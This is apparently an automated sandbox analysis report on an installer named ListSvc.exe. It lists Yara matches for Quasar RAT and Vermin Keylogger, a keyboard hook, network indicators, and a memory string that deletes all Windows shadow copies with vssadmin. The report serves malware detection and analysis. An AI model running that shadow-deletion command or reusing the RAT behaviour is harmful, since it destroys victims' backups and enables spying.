Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.620015627.000000000320E000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: RegAsm.exe, 00000017.00000002.620101519.0000000003242000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com4
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: RegAsm.exe, 00000017.00000002.620184713.0000000003256000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: RegAsm.exe, 00000017.00000002.620184713.0000000003256000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: RegAsm.exe, 00000017.00000002.620184713.0000000003256000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/xClient.Core.Data
Source: MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.620101519.0000000003242000.00000004.00000001.sdmp, MSBuild.exe, 00000019.00000002.556425095.00000000028A2000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: ListSvc.tmp, 00000001.00000003.354806901.0000000000D8C000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366623577.00000000024EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.kymoto.org
Source: ListSvc.exe, 00000000.00000003.356884300.000000000229C000.00000004.00000001.sdmp, ListSvc.tmp, 00000001.00000003.354655794.0000000000D49000.00000004.00000001.sdmp, ListSvc.exe, 00000002.00000003.369531208.00000000021EC000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.359668587.00000000033F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.kymoto.orgAbout
Source: ListSvc.exe, 00000000.00000003.356884300.000000000229C000.00000004.00000001.sdmp, ListSvc.exe, 00000002.00000003.369531208.00000000021EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.kymoto.orgz/r
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: https://jrsoftware.org/
Source: ListSvc.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: ListSvc.exe, 00000000.00000000.347808146.0000000000401000.00000020.00020000.sdmp, ListSvc.exe, 00000002.00000000.353901673.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: https://jrsoftware.org0
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: ListSvc.tmp, ListSvc.tmp, 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: https://www.innosetup.com/
Source: ListSvc.tmp	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: global traffic

HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.154.16
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.129

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

E-Banking Fraud:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6344, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp	Binary or memory string: cmd.exeU/C vssadmin.exe Delete Shadows /All /Quiet
Source: RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp	Binary or memory string: cmd.exeU/C vssadmin.exe Delete Shadows /All /Quiet
Source: MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	Binary or memory string: cmd.exeU/C vssadmin.exe Delete Shadows /All /Quiet
Source: RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: cmd.exeU/C vssadmin.exe Delete Shadows /All /Quiet

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004323DC	0_2_004323DC
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004255DC	0_2_004255DC
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0040E9C4	0_2_0040E9C4
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_006B786C	1_2_006B786C
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0040C938	1_2_0040C938
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_004323DC	2_2_004323DC
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_004255DC	2_2_004255DC
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_0040E9C4	2_2_0040E9C4
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_006B786C	3_2_006B786C
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0040C938	3_2_0040C938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_02E32298	5_2_02E32298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_02E35E48	5_2_02E35E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_02E34B70	5_2_02E34B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_02E318C0	5_2_02E318C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_02E34150	5_2_02E34150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_02E32288	5_2_02E32288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_04954000	6_2_04954000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_04952148	6_2_04952148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_04954A20	6_2_04954A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_04958BD0	6_2_04958BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0495F4E0	6_2_0495F4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_04955D08	6_2_04955D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_04951A40	6_2_04951A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05220448	6_2_05220448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05224790	6_2_05224790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05223610	6_2_05223610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_052218F0	6_2_052218F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0543D5E8	6_2_0543D5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05436FC8	6_2_05436FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0543BE78	6_2_0543BE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0543D5D9	6_2_0543D5D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05436FB8	6_2_05436FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0543BE68	6_2_0543BE68

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: ListSvc.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ListSvc.tmp.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ListSvc.tmp.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ListSvc.tmp.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ListSvc.tmp.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-EQBV6.tmp.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-EQBV6.tmp.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Roaming\AppLaunch.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior

Source: ListSvc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
